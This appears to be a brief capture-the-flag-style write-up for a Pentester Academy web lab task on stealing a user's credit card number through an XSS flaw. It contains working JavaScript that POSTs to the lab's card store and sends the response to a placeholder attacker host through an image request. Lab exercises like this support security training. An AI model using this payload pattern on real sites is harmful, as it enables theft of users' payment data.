Task 15 [Try Now]
Objectives:
- Find John's Credit Card Number using an XSS vulnerability on this page
- Post the Credit Card Number to your Attacker Server
So this is pretty much same as TASK_14. Only the URL is changed and delivery method is changed
So the target URL is http://pentesteracademylab.appspot.com/lab/webapp/jfp/15/cardstore
, and we have to send a POST XHR with user=john
data
You can send the POST body in .send
method of XHR object. See this example
const xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function () {
if (this.readyState == 4 && this.status == 200) {
new Image().src = "http://attacker-site.com?card=" + xhttp.responseText;
}
};
xhttp.open("POST", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/15/cardstore", true);
xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhttp.send("user=john");
For POC, Click Here